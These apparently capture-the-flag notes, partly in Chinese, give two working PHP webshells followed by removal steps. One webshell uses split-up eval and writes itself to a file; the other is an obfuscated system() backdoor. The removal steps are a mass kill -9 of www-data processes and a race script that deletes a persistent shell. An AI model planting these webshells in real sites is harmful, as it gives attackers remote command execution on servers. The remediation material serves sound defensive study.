1

<?php
$a = '<?ph'.'p ev'.'al($_PO'.'ST[1]);?>';
file_put_contents('/var/www/html/1.php',$a);
?>

2

<?php 
    $poc="s#y#s#t#e#m"; 
    $poc_1=explode("#",$poc); 
    $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
    $poc_2($_REQUEST['1']);
?>

查杀

  • ps aux | grep www-data | awk '{print $2}' | xargs kill -9

  • 创建一个和不死马生成的马一样名字的目录;

  • 编写一个使用ignore_user_abort(true)函数的脚本,一直竞争写入删除不死马文件,其中usleep()的时间必须要小于不死马的usleep()时间才会有效果。简单示例:

    <?php
    while (1) {
      $pid = 不死马的进程PID;
      @unlink(".ski12.php");
      exec("kill -9 $pid");
      usleep(1000);
    }
    ?>